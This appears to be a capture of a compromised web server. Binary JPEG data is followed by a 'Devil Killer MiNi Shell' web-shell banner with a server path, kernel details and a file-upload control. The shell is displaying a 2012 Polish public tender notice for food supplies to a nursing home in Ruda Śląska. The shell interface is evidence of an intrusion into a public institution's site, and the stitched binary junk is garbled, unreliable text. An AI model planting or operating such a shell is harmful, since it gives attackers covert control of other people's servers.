JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120518/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120518/111319-N-2012.html

<p class="kh_header"><b>Ruda Śląska: Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej.</b><br>
<b>Numer ogłoszenia: 111319 - 2012; data zamieszczenia: 18.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Senior" w Rudzie Śląskiej , ul. Puszkina 7, 41-704 Ruda Śląska, woj. śląskie, tel. 032 2481774, faks 032 2481774 w. 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.dps-senior.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Domu Pomocy Społecznej Senior w Rudzie Śląskiej..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych z podziałem na pakiety:

Pakiet nr 1	Dostawa przetworów spożywczych 
Pakiet nr 2	Dostawa artykułów sypkich  
Pakiet nr 3	Dostawa artykułów nabiałowych 
Pakiet nr 4	Dostawa pieczywa 
Pakiet nr 5	Dostawa wypieków cukierniczych 
Pakiet nr 6	 Dostawa warzyw świeżych i suszonych 
Pakiet nr 7	 Dostawa owoców świeżych i suszonych 
Pakiet nr 8	 Dostawa warzyw i owoców mrożonych 
Pakiet nr 9	 Dostawa ryb świeżych, mrożonych i przetworów rybnych 
Pakiet nr 10	 Dostawa mięsa wieprzowego i wołowego oraz podrobów 
Pakiet nr 11 Dostawa mięsa i podrobów drobiowych świeżych i mrożonych świeżych i mrożonych 
Pakiet nr 12	 Dostawa wędlin 
Pakiet nr 13 Dostawa jaj kurzych 
Pakiet nr 14 Dostawa czekolad i wyrobów cukierniczych 
Pakiet nr 15 Dostawa napojów bezalkoholowych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.61.00.00-7, 15.13.10.00-5, 15.41.00.00-5, 15.82.11.50-5, 15.83.00.00-5, 15.84.00.00-8, 15.11.00.00-2, 15.11.23.00-9, 15.11.20.00-6, 15.50.00.00-3, 15.13.11.30-5, 03.14.25.00-3, 15.81.00.00-9, 03.22.00.00-9, 03.21.00.00-6, 15.33.24.10-1, 15.33.11.70-9, 15.31.11.00-2, 15.20.00.00-0, 15.98.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę warunku, Wykonawca zobowiązany jest przedłożyć wraz z ofertą oświadczenie 
o dysponowaniu środkiem transportu niezbędnym do wykonania zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.dps-senior.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Senior w Rudzie Śląskiej
ul. Puszkina 7
41-704 Ruda Śląska
pok.nr 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.05.2012 godzina 11:30, miejsce: Dom Pomocy Społecznej Senior w Rudzie Śląskiej
ul. Puszkina 7
41-704 Ruda Śląska
pok.nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1 Dostawa przetworów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

LP	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość	Cena jedn. netto	Wartość netto
I	Przetwory, tłuszcze roślinne	 	 	 	 	 
1	Ananas kons. plastry -(masa netto bez zalewy)	300-1000g	kg	12		
2	Brzoskwinie kons. (masa netto bez zalewy) 	300-1000g 	kg	8		
3	Chrzan tarty na kwasku cytrynowym	170-300g	kg	20		
4	Ćwikła z chrzanem	250-500g	kg	3		
5	Dżemy owocowe niskosłodzone z kawałkami owoców (różne smaki) 	250-350g	kg	70		
6	Fasola czerwona, biała konserwowa -(masa netto bez zalewy)	200-500g	kg	5		
7	Fasola szparagowa konserwowa-(masa netto bez zalewy)	200-1000g	kg	45		
8	Groszek konserwowy-(masa netto bez zalewy)	200-500g	kg	50		
9	Krem chrzanowy	170-300g	kg	2		
10	Ketchup łagodny(minimum 55%przecieru pomidorowego	250-1000g	kg	100		
11	Koncentrat pomidorowy 30%	800-1000g	kg	70		
12	Koncentrat pomidorowy 30%	180-200g	kg	20		
13	Koncentrat buraczany płynny min.12%soku z buraków	180-500g	kg	9		
14	Krem czekoladowy do smarowania z dodat. orzechów	180-400g	kg	25		
15	Kukurydza konserwowa- (masa netto bez zalewy)	200-500g	kg	8		
16	Marmolada wielosmakowa	200-1000g	kg	2		
17	Mieszanka warzywna koktailowa kons. (party mix) -(masa netto bez zalewy)	200-1000g	kg	2		
18	Miód naturalny	200-500g	kg	15		
19	Musztarda delikatesowa	800-1000g	kg	70		
20	Musztarda delikatesowa	150-250g	kg	35		
21	Ocet 10%	0,5l	l	50		
22	Ogórki konserwowe całe -(masa netto bez zalewy)	900-1000g	kg	120		
23	Olej uniwersalny rzepakowy	0,90-1,0 l	l	350		
24	Olej słonecznikowy	0,5-1,0l	l	20		
25	Oliwki drylowane -(masa netto bez zalewy)	50-200g	kg	0,5		
26	Papryka konserwowa słodka płaty -(masa netto bez zalewy)	500-1000g	kg	5		
27	Pieczarki marynowane całe -(masa netto bez zalewy)	150-400g	kg	0,5		
28	Powidła śliwkowe	280-500g	kg	30		
29	Przyprawa do zup w płynie	900-1000g	l	210		
30	Seler konserwowy (nitki)-(masa netto bez zalewy)	280-500g	kg	6		
31	Sos słodko kwaśny, chiński, meksykański, itp..	300-500g	kg	15		
32	Zaprawa cytrynowa min.40%soku z cytryny	0,5-1l	l	250		
33	Majonez sałatkowy	180-300g	kg	30		
34	Majonez sałatkowy	800-1200g	kg	50		
II	Konserwy mięsne	 	 	 		
1	Mielonka konserwowa 	100-300g	kg	60		
2	Szynka konserwowa wieprzowa 	100-300g	kg	20		
3	Szynka konserwowa drobiowa 	100-300g	kg	5		
4	Pasztet drobiowy smakowy	100-200g	kg	15		
5	Pasztet drobiowy 	160g	kg	40		
6	Pasztet wieprzowy	100-300g	kg	80		
III	Bakalie	 	 	 		
1	Rodzynki	100g	kg	3		
2	Kokos - wiórki	100g	kg	2		
3	Orzechy włoskie łuskane	200-500g	kg	2		
4	Morele suszone	150-500g	kg	2		
5	Migdały - płatki	50-100g	kg	1,5		
6	Śliwki kalifornijskie	100-250g	kg	1		
7	Skórka pomarańczowa kandyzowana	50-100g	kg	0,3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5, 15.41.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2	Dostawa artykułów sypkich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

LP	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość	Cena jedn. netto	Wartość netto
1	Budyń - różne smaki (bez cukru)	1000g	kg	25		
2	Budyń - różne smaki (bez cukru)	35-50g	kg	8		
3	Bulion grzybowy (sypki)	500-1000g	kg	2		
4	Cukier kryształ	1000g	kg	1400		
5	Cukier puder	500-1000g	kg	1		
6	Cukier wanilinowy	10-50g	kg	1,5		
7	Cynamon mielony	10-20g	kg	0,5		
8	Czosnek granulowany 	10-20g	kg	7		
9	Galaretka owocowa - różne smaki	75-100g	kg	30		
10	Gałka muszkatołowa mielona	10-20g	kg	0,20		
11	Herbata expresowa owocowa różne smaki a 20 szt	30-40g	kg	1		
12	Herbata expresowa czarna a 100 szt	100-150g	kg	50		
13	Herbata expresowa ziołowa a 20 szt (mięta, melisa, rumianek)	30-40g	kg	0,5		
14	Kakao extra ciemne	100-200g	kg	5		
15	Kasza gryczana cała	1000g	kg	20		
16	Kasza jęczmienna -średnia	1000g	kg	60		
17	Kasza manna	1000g	kg	60		
18	Kaszka mleczno - ryżowa (smakowa)	230g	kg	12		
19	Kawa naturalna mielona 100%	100g	kg	15		
20	Kawa naturalna mielona 100%	250-500g	kg	30		
21	Kawa zbożowa	200-500g	kg	30		
22	Kleik ryżowy	170-200g	kg	10		
23	Kminek	10-20g	kg	0,30		
24	Koperek suszony	10-20g	kg	0,2		
25	Kwasek cytrynowy	10-20g	kg	1		
26	Liść laurowy	10-20g	kg	0,20		
27	Majeranek	10-20g	kg	1		
28	Makaron 4 jajeczny - łazanki *	250-1000g	kg	20		
29	Makaron 4 jajeczny - nitki *  	250-1000g	kg	70		
30	Makaron 4-jajeczny - (kolanka, rurki, muszelki, świderki) *	250-1000g	kg	130		
31	Mąka pszenna poznańska	1000g	kg	350		
32	Mąka ziemniaczana	1000g	kg	200		
33	Mąka krupczatka	1000g	kg	5		
34	Mąka żytnia żurek	1000g	kg	20		
35	Papryka słodka mielona	10-20g	kg	2,5		
36	Pieprz czarny mielony	10-20g	kg	3		
37	Płatki kukurydziane smakowe	500-1000g	kg	20		
38	Płatki owsiane	500g	kg	25		
39	Płatki ryżowe	200-500g	kg	20		
40	Proszek do pieczenia	10-50g	kg	0,2		
41	Przyprawa kebab, gyros, curry	10-20g	kg	0,10		
42	Przyprawa warzywna do potraw	75-200g	kg	12		
43	Rosół drobiowy (sypki)	500-3000g	kg	30		
44	Ryż biały	1000g	kg	150		
45	Soda oczyszczona	10-50g	kg	0,10		
46	Sos jasny	500-1000g	kg	2		
47	Sos pieczeniowy ciemny	500-1000g	kg	3,5		
48	Sos sałatkowy - różne smaki	8-20g	kg	0,50		
49	Sól spożywcza jodowana	1000g	kg	200		
50	Sucharki	280-300g	kg	10		
51	Ziele angielskie	10-20g	kg	0,3		
52	Żelatyna spożywcza wieprzowa	50g	kg	7.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.61.00.00-7, 15.82.11.50-5, 15.83.00.00-5, 15.84.10.00-5, 15.85.10.00-8, 15.86.00.00-4, 15.87.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3	Dostawa artykułów nabiałowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	 Sugerowana wielkość
opakowania 	Jm	Orientacyjna ilość	Cena jedn. netto	Wartość netto
1	Deser wielosmakowy: ryżowy, z kaszą manną 	130-200g	kg	100		
2	Deser wielosmakowy z bitą śmietaną na bazie budyniu,  twarożku 	150-200g	kg	120		
3	 Galaretka owocowa 	150-200g	kg	20		
4	 Jogurt owocowy 	125-200g	kg	250		
5	Jogurt naturalny 	150-200g	kg	150		
6	Maślanka naturalna karton	1L	l	350		
7	Maślanka owocowa	250-500g	kg	150		
8	Kefir naturalny	150-200g	kg	45		
9	Margaryna do smarowania pieczywa z dodatkiem masła	500g	kg	10		
10	Margaryna mleczna zwykła 	250g	kg	150		
11	Masło extra 82% 	200g	kg	900		
12	Mleko 2%  	10-20l 	l	5500		
13	Mleko 2%  w folii	1l	l	300		
14	Mleko w proszku	500g	kg	2		
15	Ser biały półtłusty - krajanka	kg	kg	350		
16	Ser twarogowy kremowy	kg	kg	10		
17	Ser podpuszczkowy pleśniowy 	100-200g	kg	10		
18	Ser typu feta	100-300g	kg	1		
19	Ser domowy z kminkiem	150-200g	kg	70		
20	Ser wielosmakowy fromage	75-100g	kg	40		
21	Ser żółty łagodny 45%	1000-3000g	kg	120		
22	Ser żółty wędzony	1000-2000g	kg	20		
23	Serek topiony kremowy 27% tł.(pochodzenia zwierzęcego)-różne smaki	100g	kg	100		
24	Serek topiony kremowy wędzony 	1000-2000g	kg	60		
25	Serek homogenizowany różne smaki	100-200g	kg	270		
26	Serek naturalny homogenizowany	100-200g	kg	70		
27	Serek kanapkowy twarożkowy, kremowy - różne smaki	100-150g	kg	60		
28	Serek twarożkowy wiejski ziarnisty	200g	kg	200		
29	Śmietanka do kawy 10%	10 g	szt	1200		
30	Śmietana spożywcza słodka 18%  	250-500ml	l	200		
31	Śmietana 12%  homogenizowana 	180g-400g	kg	10		
32	Śmietana 30% kremówka	200-500g	kg	15		
33	Smalec wieprzowy kostka	200-250g	kg	25		
34	Napój probiotyczny 	100g	kg	20		
35	Mleczko smakowe	200g	szt	20		
36	Drożdże piekarnicze świeże	42-100g	kg	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.43.00.00-1, 15.89.80.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4		Dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


L.p	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna
ilość zamówienia	Cena jedn. netto	Wartość netto
1
	Chleb  pszenno- żytni krojony	900-1000g	kg	6000		
2
	Chleb wielosmakowy - krojony (słonecznikowy, sojowy, graham, karmelowy, cebulowy, razowy itd.)	400-500g	kg	700		
3-	Wek krojony	300g-500g	kg	80		
4-	Bułka kajzerka	50g	kg	720		
5
	Pieczywo mleczne (rogal, chałka)	80g-100g	kg	50		
6 	Bułka mleczna	60g-80g	kg	100		
7	Groszek ptysiowy		kg	2,50		
8	Bułka tarta	400-500g	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET NR 5

	DOSTAWA WYPIEKÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Rogalik z budyniem	80-100g	kg	65		
2	Drożdżówka wielosmakowa (ser-mak, ser-marmolada )	100-150g	kg	50		
3	Drożdżówka z ograniczoną ilością cukru	100-150g	kg	30		
4	Jagodzianka	100g	kg	52		
5	Pączki z różnymi nadzieniami (śmietana, marmolada, budyń, adwokat itd..)	100g	kg	100		
6	Ciastka w-z	100g	kg	30		
7	Ciasto drożdżowe z serem	 	kg	60		
8	Ciasto drożdżowe z posypką	 	kg	30		
9	Ciasto drożdżowe z owocami	 	kg	30		
10	Ciasto piaskowe z owocami	 	kg	150		
11	Szarlotka	 	kg	80		
12	Sernik na cieście ucieranym	 	kg	85		
13	Rolada z bitą śmietaną	 	kg	30		
14	Ptysie miniaturki ze śmietaną, budyniem 	 	kg	10		
15	Kokosanki	 	kg	20		
16	Piernik do moczk	 	kg	3		
17	Piernik z bakaliami 	 	kg	15		
18	Babeczki piaskowe	80-100g	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET NR 6

DOSTAWA WARZYW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

 	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Buraki 	 	kg	400		
2	Botwinka 	 	kg	10		
3	Brokuły różyczka (VII-X m-c)	 	kg	40		
4	Cebula	 	kg	250		
5	Cebulka zielona, szczypiorek	 	kg	25		
6	Cebulka zielona- (XI-XII m-c)	 	kg	10		
7	Czosnek polski	 	kg	15		
8	Fasolka szparagowa	 	kg	40		
9	Kalafior różyczka -(VII-Xm-c)	 	kg	210		
10	Kalarepa	 	kg	20		
11	Kapusta biała	 	kg	400		
12	Kapusta biała młoda 	 	kg	80		
13	Kapusta czerwona	 	kg	300		
14	Kapusta czerwona młoda 	 	kg	50		
15	Kapusta kiszona 	 	kg	400		
16	Kapusta pekińska	 	kg	60		
17	Kapusta włoska	 	kg	80		
18	Koperek zielony 	 	kg	40		
19	Koperek zielony (XI-XII m-c)	 	kg	20		
20	Ogórki kiszone	 	kg	100		
21	Ogórki małosolne	 	kg	25		
22	Ogórki zielone 	 	kg	100		
23	Ogórki zielone  (XI-XII m-c)	 	kg	20		
24	Papryka czerwona 	 	kg	20		
25	Pieczarki	 	kg	150		
26	Pasternak	 	kg	1		
27	Pietruszka korzeń	 	kg	350		
28	Pietruszka zielona 	 	kg	80		
29	Pietruszka zielona (XI-XIImc)	 	kg	40		
30	Pomidorki koktailowe	 	kg	1		
31	Pomidory 	 	kg	350		
32	Por	 	kg	80		
33	Rzodkiewka 	100g	pęczek	60		
34	Rzodkiewka (XI-XII  m-c)	100g	pęczek	30		
35	Sałata ozdobna	200g	szt	10		
36	Sałata zielona 	300g	szt	60		
37	Sałata zielona (XI-XII m-c)	200g	szt	10		
38	Seler korzeń	 	kg	400		
39	Marchew	 	kg	1100		
40	Ziemniaki 	 	kg	8000		
41	Ziemniaki młode (VII m-c)	 	kg	2000		
42	Fasola kolorowa	 	kg	15		
43	Fasola Jaś	 	kg	40		
44	Groch łuszczony	 	kg	20		
